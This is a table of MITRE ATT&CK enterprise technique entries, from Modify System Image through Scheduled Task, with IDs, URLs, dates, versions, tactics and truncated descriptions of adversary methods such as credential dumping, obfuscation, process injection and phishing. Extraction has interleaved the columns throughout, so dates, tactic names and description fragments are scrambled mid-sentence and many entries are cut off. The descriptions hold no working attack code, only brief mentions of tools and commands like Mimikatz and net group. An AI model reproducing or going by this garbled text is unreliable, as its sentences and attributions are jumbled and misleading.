T1601 attack-pat Modify SysTo change https://attack.mitre.org/techniques/T1601
the operating system, theOctoberenterprise-1.0
19 October22 adversary typically only needs to affect
Defense Ev this one file, repl
T1601.002attack-pat Modify Sys Downgrading the system image to an older
https://attack.mitre.org/techniques/T1601/002 versions
19 October22 Octoberenterprise-1.0 may allow anDefense Ev to evade defense
adversary
T1601.001attack-pat Modify SysWhen the technique is19performed
October22on the running operating system
https://attack.mitre.org/techniques/T1601/001
Octoberenterprise-1.0 in memory
Defense Ev and not on the
T1111 attack-pat Multi-FactoOther methods of MFA 31may
Maybe 20intercepted
https://attack.mitre.org/techniques/T1111 and used by an adversary
15 Octoberenterprise-2.1 to authenticate. It is com
Credential
T1621 attack-pat Multi-Fact In some cases, adversaries may continuously
https://attack.mitre.org/techniques/T1621
01 April 2014 repeat login attempts
Octoberenterprise-1.2 in order to bombard users
Credential
T1104 attack-pat Multi-Stag The different stages will likely be hosted
https://attack.mitre.org/techniques/T1104 separately
31 May 20 14 July 20 enterprise-1.0 with no overlapping
Command infrastructure.
a The lo
T1106 attack-pat Native API Adversarieshttps://attack.mitre.org/techniques/T1106
may use assembly
31 May 20to12directly or in-directly invoke syscalls
Septementerprise-2.2 Execution in an attempt to subver
T1599 attack-pat Network BoWhen an adversary takes control ofMay such20
https://attack.mitre.org/techniques/T1599
19 October05 a boundary device, theyDefense
enterprise-1.1 can bypass Ev its policy enforc
T1599.001attack-pat Network BoAdversarieshttps://attack.mitre.org/techniques/T1599/001
may use [Patch
19 October21
System Octoberenterprise-1.0
Image](https://attack.mitre.org/techniques/T1601/001)
Defense Ev t
T1498 attack-pat Network DeFor DoS attacks
https://attack.mitre.org/techniques/T1498
targeting
17 April
the hosting
2015 Octoberenterprise-1.2
system directly, see [Endpoint Impact Denial of Service](https://
T1498.001attack-pat Network DeBotnets arehttps://attack.mitre.org/techniques/T1498/001
commonly02used March to conduct
15 Octoberenterprise-1.4
network flooding attacksImpact against networks and service
T1498.002attack-pat Network DenReflection attacks
https://attack.mitre.org/techniques/T1498/002
often
02 take
March advantage
15 Octoberenterprise-1.4
of protocols with larger responses
Impact than requests in or
T1046 attack-pat Network SeWithin macOS https://attack.mitre.org/techniques/T1046
environments,
31 May 20 adversaries
11 Augustmay enterprise-3.1
use the native Bonjour
Discovery application to discover s
T1135 attack-pat Network ShFile sharinghttps://attack.mitre.org/techniques/T1135
over a Windows
14 Decembnetwork
29 Septementerprise-3.2
occurs over the SMB protocol. Discovery
(Citation: Wikipedia Shar
T1040 attack-pat Network SnOn networkhttps://attack.mitre.org/techniques/T1040
devices, adversaries
31 May 20 15 may
Octoberenterprise-1.6
perform network captures Credential
using [Network Device CLI](h
T1095 attack-pat Non-ApplicICMP communication
https://attack.mitre.org/techniques/T1095
31
between
May 20hosts
29 Septementerprise-2.3
is one example.(Citation: Cisco Command
Synful Knock
a Evolution) B
T1571 attack-pat Non-StandaAdversaries https://attack.mitre.org/techniques/T1571
Several of themay 14 March
alsomentioned
tools make in12associated
changes Septementerprise-1.1
to victimsub-techniques
systems to abuse may Command
be used bya both
non-standard ports.adversaries
For exam
T1003 attack-pat OS CredentThe Linux utility,
https://attack.mitre.org/techniques/T1003
31 Maycan
unshadow, 20 15
be Octoberenterprise-2.2
used to combine the two filesCredential in a format suited for passw
T1003.008attack-pat OS Credent https://attack.mitre.org/techniques/T1003/008
11 Februar25 Septementerprise-1.1 Credential
T1003.005attack-pat OS CredentNote: Cached https://attack.mitre.org/techniques/T1003/005
21 Februar15
credentials for Windows Octoberenterprise-1.1 Credential
Vista are derived using PBKDF2.(Citation: PassLib msca
T1003.006attack-pat OS CredentDCSync functionality
https://attack.mitre.org/techniques/T1003/006
11 Februar15
has Octoberenterprise-1.1
been included in the "lsadump" moduleCredentialin [Mimikatz](https://attack
T1003.004attack-pat OS Credent[Reg](https://attack.mitre.org/software/S0075)
* CredSSP: https://attack.mitre.org/techniques/T1003/004
Provides SSO 21 Februar13
and Network AugustLevelenterprise-1.1
can be used for
Authentication Credential
to extract
Remote from the Registry.
Desktop [Mim
Services.(Cita
T1003.001attack-pat OS Credent* Invoke-NinjaCopy
https://attack.mitre.org/techniques/T1003/001
11 Februar13 August enterprise-1.5 Credential
T1003.003attack-pat OS Credent https://attack.mitre.org/techniques/T1003/003
11 Februar28 July 20 enterprise-1.2 Credential
T1003.007attack-pat OS CredentIf running
* User as or with
startthe permissions of a web browser, a processCredential
https://attack.mitre.org/techniques/T1003/007
accounts 11
withFebruar15 Octoberenterprise-1.2
a RID of 1,000+. can search the `/maps` & `/m
T1003.002attack-pat OS Credent https://attack.mitre.org/techniques/T1003/002
11 Februar15 Octoberenterprise-1.1 Credential
T1027 attack-pat ObfuscatedAdversarieshttps://attack.mitre.org/techniques/T1027
may also 31 abuse
May[Command
20 16 AprilObfuscation](https://attack.mitre.org/techniques/T10
20enterprise-1.6 Defense Ev
T1027.001attack-pat ObfuscatedBinary padding effectively changes the checksum
https://attack.mitre.org/techniques/T1027/001
05 Februar30 March of the file and can
enterprise-1.2 also be
Defense Ev used to avoid has
T1027.010attack-pat ObfuscatedTools such https://attack.mitre.org/techniques/T1027/010
as <code>Invoke-Obfuscation</code>
14 March 12 Septementerprise-1.0 and <code>Invoke-DOSfucation</code>
Defense Evasion hav
T1027.004attack-pat ObfuscatedSource code payloads16 may also be03encrypted,
https://attack.mitre.org/techniques/T1027/004
March encoded, and/or embedded
Octoberenterprise-1.1 Defense Evwithin other files, s
T1027.007attack-pat ObfuscatedVarious methods may22 beAugust
used to23 obfuscate
https://attack.mitre.org/techniques/T1027/007malware calls to API functions.
August enterprise-1.0 Defense EvasionFor example, hash
T1027.009attack-pat ObfuscatedEmbeddedhttps://attack.mitre.org/techniques/T1027/009
content may 30 also be used
Septem29 as [Process Injection](https://attack.mitre.org/technique
Septementerprise-1.1 Defense Evasion
T1027.013attack-pat ObfuscatedAdversarieshttps://attack.mitre.org/techniques/T1027/013
may also 29 abuse
March
file-specific
15 Octoberenterprise-1.0
as well as custom encoding Defense
schemes.Evasion
For example, By
T1027.011attack-pat ObfuscatedSome forms https://attack.mitre.org/techniques/T1027/011
of fileless23storage
Marchactivity
04 Octoberenterprise-2.0
may indirectly create artifacts Defensein theEvasion
file system, but in
T1027.006attack-pat ObfuscatedFor example, https://attack.mitre.org/techniques/T1027/006
JavaScript 20Blobs
May 20 can12be
Septementerprise-1.1
abused to dynamically generate Defense malicious
Ev files in the vic
T1027.005attack-pat ObfuscatedA good example
https://attack.mitre.org/techniques/T1027/005
of this
19isMarch
when malware
28 April 20enterprise-1.1
is detected with a file signature
Defense
LNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing and
Ev quarantined by a
T1027.012attack-pat ObfuscatedOther obfuscation
https://attack.mitre.org/techniques/T1027/012
29 Septem17
techniques can beOctoberenterprise-1.0 Defense Evcode to accomplis
used in conjunction with polymorphic
T1027.014attack-pat Obfuscated https://attack.mitre.org/techniques/T1027/014
27 Septem09 Octoberenterprise-1.0 Defense Evasion
T1027.002attack-pat ObfuscatedUtilities usedhttps://attack.mitre.org/techniques/T1027/002
to perform 05 Februar30 March are
software packing enterprise-1.2 Defense
called packers. Example Ev are MPRESS an
packers
T1027.003attack-pat ObfuscatedBy the endhttps://attack.mitre.org/techniques/T1027/003
of 2017, a 05 Februar30
threat March
group used enterprise-1.2
<code>Invoke-PSImage</code> Defenseto Evhide [PowerShell](
T1027.008attack-pat ObfuscatedAdversarieshttps://attack.mitre.org/techniques/T1027/008
29 Septem16
may use stripped Aprilin20enterprise-1.1
payloads order to make malwareDefense analysisEvasion
more difficult. For e
T1588 attack-pat Obtain CapaIn
Foraddition
example,https://attack.mitre.org/techniques/T1588
to by
purchasing01 October16
utilizing Septementerprise-1.1
acapabilities, adversaries
publicly available LLM an may Resource
steal capabilities
adversary is essentiallyfromoutsourcing
third-partyor entiti
aut
T1588.007attack-pat Obtain Capab https://attack.mitre.org/techniques/T1588/007
11 March 12 Septementerprise-1.0 Resource Developmen
T1588.003attack-pat Obtain Capa https://attack.mitre.org/techniques/T1588/003
Prior to [Code 01 October17 Octoberenterprise-1.1
Signing](https://attack.mitre.org/techniques/T1553/002), Resource adversaries may purc
T1588.004attack-pat Obtain Capab https://attack.mitre.org/techniques/T1588/004
After obtaining 01certificate,
a digital October16 an Septementerprise-1.2
adversary may then installResource that certificate (see [Install D
T1588.005attack-pat Obtain CapaAdversarieshttps://attack.mitre.org/techniques/T1588/005
may use exploits duringApril
01 October15 various phases of the adversary
20enterprise-1.0 lifecycle (i.e. [Exploit Pub
Resource
T1588.001attack-pat Obtain Cap In addition to downloading free malware from
https://attack.mitre.org/techniques/T1588/001
01 October17 Octoberenterprise-1.1the internet, adversaries
Resource may purchase these c
T1588.002attack-pat Obtain CapaAdversarieshttps://attack.mitre.org/techniques/T1588/002
may obtain 01tools to support
October16 their operations, including
Septementerprise-1.1 to support execution of po
Resource
T1588.006attack-pat Obtain CapaAn adversary may monitor vulnerability
Aprildisclosures/databases
https://attack.mitre.org/techniques/T1588/006
15 October15 20enterprise-1.0 toResource
understand the state of exis
T1137 attack-pat Office ApplA variety ofhttps://attack.mitre.org/techniques/T1137
features have been discovered
14 Decemb in Outlook that can bePersistenc
15 Octoberenterprise-1.4 abused to obtain persistenc
T1137.006attack-pat Office ApplAdd-ins can be used to obtain persistence because
https://attack.mitre.org/techniques/T1137/006
07 Novemb15 Octoberenterprise-1.2 they can be set to execute code when an O
Persistenc
T1137.001attack-pat Office ApplAn adversary may need 07to enable15macros to execute unrestrictedPersistenc
https://attack.mitre.org/techniques/T1137/001
Novemb Octoberenterprise-1.2 depending on the system or
T1137.002attack-pat Office ApplAdversarieshttps://attack.mitre.org/techniques/T1137/002
may add this Registry
07 Novemb 15key and specify a malicious DLLPersistenc
Octoberenterprise-1.3 that will be executed whene
T1137.003attack-pat Office ApplOnce
Once malicious
https://attack.mitre.org/techniques/T1137/003
malicious forms
home07 haveNovemb
pages been
have15added
Octoberenterprise-1.2
been to the to
added user’s mailbox,
the user’s they
Persistenc
mailbox, will
theybewill
loaded when Outlo
be loaded when
T1137.004attack-pat Office App https://attack.mitre.org/techniques/T1137/004
07 Novemb15 Octoberenterprise-1.2 Persistenc
T1137.005attack-pat Office ApplOnce malicious
https://attack.mitre.org/techniques/T1137/005
rules have
07 Novemb
been added
15 Octoberenterprise-1.2
to the user’s mailbox, theyPersistenc
will be loaded when Outloo
T1201 attack-pat Password PPassword policies
https://attack.mitre.org/techniques/T1201
can18 beApril
discovered
2015 Octoberenterprise-1.6
in cloud environments usingDiscovery available APIs such as <code
T1120 attack-pat Peripheral Adversarieshttps://attack.mitre.org/techniques/T1120
31 May 20 30 March enterprise-1.3 Discovery
T1069 attack-pat PermissionAdversarieshttps://attack.mitre.org/techniques/T1069
may attempt 31 Mayto discover
20 15 Octoberenterprise-2.6
group permission settings inDiscovery
many different ways. This d
T1069.003attack-pat PermissionAdversarieshttps://attack.mitre.org/techniques/T1069/003
may attempt 21 Februar15
to list ACLsOctoberenterprise-1.5
for objects to determine theDiscovery
owner and other accounts w
T1069.002attack-pat PermissionCommandshttps://attack.mitre.org/techniques/T1069/002
such as <code>net
21 Februar07 groupApril
/domain</code>
20enterprise-1.2 of the [Net](https://attack.mitre.org/so
Discovery
T1069.001attack-pat PermissionCommandshttps://attack.mitre.org/techniques/T1069/001
12 Marchlocalgroup</code>
such as <code>net 07 April 20enterprise-1.2 Discovery
of the [Net](https://attack.mitre.org/softwa
T1566 attack-pat Phishing Victims may https://attack.mitre.org/techniques/T1566
also receive 02 March
phishing07messages
Octoberenterprise-2.6
that instruct them toInitial
call aAcce
phone number where
T1598 attack-pat Phishing foPhishing forhttps://attack.mitre.org/techniques/T1598
information 02 October31 May 20evasive
may also involve enterprise-1.3 Reconnaiss
techniques, such as removing or manipulati
T1598.002attack-pat Phishing f All forms ofhttps://attack.mitre.org/techniques/T1598/002
spearphishing 02 October31 May 20 enterprise-1.1
are electronically Reconnaiss
delivered social engineering targeted at a specific
T1598.003attack-pat Phishing foFrom the fakehttps://attack.mitre.org/techniques/T1598/003
website, 02information
October31 May 20 enterprise-1.6
is gathered in web forms andReconnaiss
sent to the adversary. Adve
T1598.001attack-pat Phishing foAll forms ofhttps://attack.mitre.org/techniques/T1598/001
spearphishing 02 October15 April 20enterprise-1.0
are electronically Reconnaiss
delivered social engineering targeted at a specific
T1598.004attack-pat Phishing foAdversarieshttps://attack.mitre.org/techniques/T1598/004
may also 07 useSeptem08
information Septementerprise-1.0
from previous reconnaissance Reconnaissance
efforts (ex: [Search Open
T1566.001attack-pat Phishing: There are manyhttps://attack.mitre.org/techniques/T1566/001
options 02 for
March 15 Octoberenterprise-2.2
the attachment such as Microsoft OfficeInitial Acce
documents, executables,
T1566.002attack-pat Phishing: SSimilarly, malicious links may also15target device-based authorization,
https://attack.mitre.org/techniques/T1566/002
02 March Octoberenterprise-2.7 Initialsuch
Acceas OAuth 2.0 device
T1566.004attack-pat Phishing: SAdversarieshttps://attack.mitre.org/techniques/T1566/004
may also 07 combine
Septem15 voiceOctoberenterprise-1.1
phishing with [Multi-Factor Authentication
Initial Access Request Gene
T1566.003attack-pat Phishing: SA commonhttps://attack.mitre.org/techniques/T1566/003
example is02 toMarch
build rapport with a target via social media,
15 Octoberenterprise-2.0 Initialthen
Accesend content to a p
T1647 attack-pat Plist File MFor example, adversaries can add
2020a April
malicious
https://attack.mitre.org/techniques/T1647
09 April application path toDefense
20enterprise-1.0 the `~/Library/Preferences/c
Ev
T1653 attack-pat Power SettAware thathttps://attack.mitre.org/techniques/T1653
some malware 05 June cannot
2016survive system reboots, adversaries
Octoberenterprise-1.0 may entirely delete file
Persistenc
T1542 attack-pat Pre-OS BooAdversarieshttps://attack.mitre.org/techniques/T1542
may overwrite data 26
13 Novemb in boot drivers or firmware such Defense
Februarenterprise-1.2 as BIOS (Basic
Ev Input/Output
T1542.003attack-pat Pre-OS BooThe MBR passes control 19 of the boot processenterprise-1.1
https://attack.mitre.org/techniques/T1542/003
Decemb 30 March to the VBR. Similar toDefense
the case Evof MBR, an advers
T1542.002attack-pat Pre-OS BooMalicious component firmware
Decembcould provide
https://attack.mitre.org/techniques/T1542/002
19 01 April both a persistent level
20enterprise-1.1 of access
Defense Ev to systems des
T1542.004attack-pat Pre-OS Bo ROMMON https://attack.mitre.org/techniques/T1542/004
is a Cisco network
20 October22deviceOctoberenterprise-1.0
firmware that functions as aDefenseboot loader,
Ev boot image, or
T1542.001attack-pat Pre-OS BooSystem firmware
https://attack.mitre.org/techniques/T1542/001
like BIOS
19 Decemb
and (U)EFI
16 April
underly
20enterprise-1.1
the functionality ofDefense
a computerEv and may be mo
T1542.005attack-pat Pre-OS BooAdversarieshttps://attack.mitre.org/techniques/T1542/005
may manipulate20 October22
the configuration
Octoberenterprise-1.0
on the network device
Defense specifying
Ev use of a malic
T1057 attack-pat Process Di On networkhttps://attack.mitre.org/techniques/T1057
devices, [Network
31 May 20Device16 AprilCLI](https://attack.mitre.org/techniques/T1059/008)
20enterprise-1.5 Discovery co
T1055 attack-pat Process Inj More sophisticated
https://attack.mitre.org/techniques/T1055
samples
31 Maymay 20 30
perform
March multiple
enterprise-1.3
process injections
Defenseto segment
Eva modules and
T1055.004attack-pat Process Inj Running codehttps://attack.mitre.org/techniques/T1055/004
in the context
14 January18
of another
Octoberenterprise-1.1
process may allow accessDefenseto the process's
Eva memory, sy
T1055.001attack-pat Process Inj Running codehttps://attack.mitre.org/techniques/T1055/001
14 January11
in the context August
of another enterprise-1.3
process may allow accessDefense Eva
to the process's memory, sy
T1055.011attack-pat Process In Running code https://attack.mitre.org/techniques/T1055/011
14 January10
in the context Novemb
of another enterprise-1.0
process may allow accessDefense Eva
to the process's memory, sy
T1055.015attack-pat Process Inj Finally, thehttps://attack.mitre.org/techniques/T1055/015
payload is22 Novemb
triggered 14sending
by August the enterprise-1.1 Defense Eva message to t
<code>LVM_SORTITEMS</code>
T1055.002attack-pat Process Inj Running codehttps://attack.mitre.org/techniques/T1055/002
14 January18
in the context Octoberenterprise-1.1
of another process may allow accessDefense Eva
to the process's memory, sy
T1055.009attack-pat Process In Running code https://attack.mitre.org/techniques/T1055/009
14 January20
in the context Juneprocess
of another 20enterprise-1.0
may allow accessDefense Eva
to the process's memory, sy
T1055.013attack-pat Process In This behaviorhttps://attack.mitre.org/techniques/T1055/013
will likely14not
January09
result inFebruarenterprise-1.0
elevated privileges since theDefense
injected Eva
process was spawne
T1055.012attack-pat Process Inj This is veryhttps://attack.mitre.org/techniques/T1055/012
14 January12
similar to [Thread Local Septementerprise-1.3 Defense Eva
Storage](https://attack.mitre.org/techniques/T1055/005)
T1055.008attack-pat Process Inj Running code in the context of another process may allow accessDefense
https://attack.mitre.org/techniques/T1055/008
14 January18 Octoberenterprise-1.1 to the process's
Eva memory, sy
T1055.003attack-pat Process Inj Running code in the context of another process
https://attack.mitre.org/techniques/T1055/003
14 January18 Octoberenterprise-1.1 may allow access to the process's
Defense Eva memory, sy
T1055.005attack-pat Process Inj Running code in the context of another process may allow accessDefense
https://attack.mitre.org/techniques/T1055/005
14 January18 Octoberenterprise-1.1 to the process's
Eva memory, sy
T1055.014attack-pat Process Inj Running code in the context of another process
https://attack.mitre.org/techniques/T1055/014
14 January07 July 20 may allow accessDefense
enterprise-1.1 to the process's
Eva memory, sy
T1572 attack-pat Protocol T Adversarieshttps://attack.mitre.org/techniques/T1572
may also 15 leverage
March[Protocol
27 March Tunneling](https://attack.mitre.org/techniques/T157
enterprise-1.0 Command a
T1090 attack-pat Proxy Adversaries can also take advantage of
https://attack.mitre.org/techniques/T1090routing
31 May 20 30 August enterprise-3.1 schemes in Content DeliveryaNetworks (CDNs)
Command
T1090.004attack-pat Proxy: DomFor example, if domain-x and domain-y are enterprise-1.1
https://attack.mitre.org/techniques/T1090/004
14 March 30 March customers of the same CDN, it isapossible to place
Command
T1090.002attack-pat Proxy: ExteExternal connection proxies are used to mask
https://attack.mitre.org/techniques/T1090/002
14 March 16 April the destination of C2
20enterprise-1.1 traffic and
Command a are typically im
T1090.001attack-pat Proxy: InteBy using a compromised
https://attack.mitre.org/techniques/T1090/001
14 March
internal07 system
Marchasenterprise-1.1
a proxy, adversaries mayCommand
conceala the true destinati
T1090.003attack-pat Proxy: MulSimilarly, adversaries
https://attack.mitre.org/techniques/T1090/003
14
may March
abuse25 peer-to-peer
Septementerprise-2.2
(P2P) and blockchain-oriented
Command a infrastructure to
T1012 attack-pat Query RegiThe Registry https://attack.mitre.org/techniques/T1012
contains 31 a significant
May 20 03amount
April 20enterprise-1.3
of information about the Discovery
operating system, configu
T1620 attack-pat Reflective Reflective code
https://attack.mitre.org/techniques/T1620
injection05 October09
is very similar
Februarenterprise-1.2
to [Process Injection](https://attack.mitre.org/techniq
Defense Ev
T1219 attack-pat Remote AccInstallationhttps://attack.mitre.org/techniques/T1219
of many remote 18 Aprilaccess
2012 April
software20enterprise-2.3
may also include persistence
Command(e.g., a the software's
T1563 attack-pat Remote SerAdversarieshttps://attack.mitre.org/techniques/T1563
may commandeer
25 Februar26 theseFebruarenterprise-1.1
sessions to carry out actionsLateral
on remoteM systems. [Remot
T1563.002attack-pat Remote ServAdversarieshttps://attack.mitre.org/techniques/T1563/002
may perform25 Februar14
RDP session August
hijacking
enterprise-1.1
which involves stealing
LateralaMlegitimate user's rem
T1563.001attack-pat Remote Serv[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001)
https://attack.mitre.org/techniques/T1563/001
25 Februar23 March enterprise-1.0 differs
LateralfromM use of [SSH](http
T1021 attack-pat Remote SerLegitimate https://attack.mitre.org/techniques/T1021
applications 31(such
May 20 01 March Deployment
as [Software enterprise-1.5 Lateral M
Tools](https://attack.mitre.org/techni
T1021.007attack-pat Remote SerIn some cases,https://attack.mitre.org/techniques/T1021/007
21 Februar15
adversaries may be able Octoberenterprise-1.1 Lateral Movement
to authenticate to these services via [Application Acce
T1021.008attack-pat Remote SerAdversarieshttps://attack.mitre.org/techniques/T1021/008
may utilize02these
June cloud
2027 Octoberenterprise-1.0
native methods to directly access Lateral Movement
virtual infrastructure an
T1021.003attack-pat Remote SerThrough DCOM, https://attack.mitre.org/techniques/T1021/003
11 Februar11
adversaries operating August enterprise-1.3
in the Lateral Mprivileged user can r
context of an appropriately
T1021.001attack-pat Remote SerAdversarieshttps://attack.mitre.org/techniques/T1021/001
may connect11 Februar07
to a remote August
system enterprise-1.2
over RDP/RDS to expandLateralaccess
M if the service is
T1021.002attack-pat Remote SeWindows systemshttps://attack.mitre.org/techniques/T1021/002
have11hidden
Februar28 July 20
network enterprise-1.2
shares that are accessibleLateral
only to Madministrators and
T1021.004attack-pat Remote SerSSH is a protocol
https://attack.mitre.org/techniques/T1021/004
that 11 Februar11
allows authorized August enterprise-1.2
users to open remote shellsLateral M computers. Man
on other
T1021.005attack-pat Remote SerAdversarieshttps://attack.mitre.org/techniques/T1021/005
may abuse 11VNC
Februar12
to perform Septementerprise-1.1 Lateral M user such as openi
malicious actions as the logged-on
T1021.006attack-pat Remote SeWinRM is the
Adversaries name
alsoof11both adiscovery
Windows ofservice
https://attack.mitre.org/techniques/T1021/006
may Februar12
target and
Septementerprise-1.2
network a protocol that
infrastructure allows
Lateral
as well Maleverage
as user to interact
[Networkw
T1018 attack-pat Remote Sys https://attack.mitre.org/techniques/T1018
31 May 20 14 August enterprise-3.5 Discovery
T1091 attack-pat Replicatio Mobile devices may also be used toOctoberenterprise-1.2
infect PCs with malware if connected
https://attack.mitre.org/techniques/T1091
31 May 20 17 Initial Accvia USB.(Citation: Ex
T1496 attack-pat Resource HIn some cases, adversaries may leverage
https://attack.mitre.org/techniques/T1496
17 April 2013 multiple types of Resource
Octoberenterprise-2.0 ImpactHijacking at once.(Citation
T1496.002attack-pat Resource HIn additionhttps://attack.mitre.org/techniques/T1496/002
to incurring 25potential
Septem25 financial costs or availability disruptions,
Septementerprise-1.0 Impact this technique may
T1496.004attack-pat Resource HiIn some cases, adversaries may leverage services that the victim Impact
https://attack.mitre.org/techniques/T1496/004
25 Septem16 Octoberenterprise-1.0 is already using. In others, pa
T1496.001attack-pat Resource HAdditionally, some cryptocurrency
25 Septem13mining
https://attack.mitre.org/techniques/T1496/001malware identify then Impact
Octoberenterprise-1.0 kill off processes for competi
T1496.003attack-pat Resource HThreat actors often use25publicly available web forms, such as one-time
https://attack.mitre.org/techniques/T1496/003
Septem16 Octoberenterprise-1.0 Impactpassword (OTP) or acc
T1207 attack-pat Rogue Doma This technique
https://attack.mitre.org/techniques/T1207
may bypass
18 Aprilsystem
2008 logging
March and enterprise-2.1
security monitorsDefense
such as security
Ev information
T1014 attack-pat Rootkit Rootkits orhttps://attack.mitre.org/techniques/T1014
rootkit enabling
31 Mayfunctionality
20 30 Marchmay enterprise-1.1
reside at the user orDefense
kernel Ev level in the operatin
T1053 attack-pat Scheduled Adversarieshttps://attack.mitre.org/techniques/T1053
may use task
31 Mayscheduling
20 15 Octoberenterprise-2.3
to execute programs at system Execution,
startup or on a scheduled
T1053.002attack-pat Scheduled In Linux environments,
https://attack.mitre.org/techniques/T1053/002
27adversaries
Novemb12 may Octoberenterprise-2.3
also abuse [at](https://attack.mitre.org/software/S01
Execution,
T1053.007attack-pat Scheduled In Kubernetes,https://attack.mitre.org/techniques/T1053/007
a CronJob
29 March
may be15 used
Octoberenterprise-1.3
to schedule a Job that runsExecution,
one or more containers to p
T1053.003attack-pat Scheduled An adversary https://attack.mitre.org/techniques/T1053/003
may use03 <code>cron</code>
Decemb15 Octoberenterprise-1.2
in Linux or Unix environments
Execution, to execute program
T1053.005attack-pat Scheduled Adversarieshttps://attack.mitre.org/techniques/T1053/005
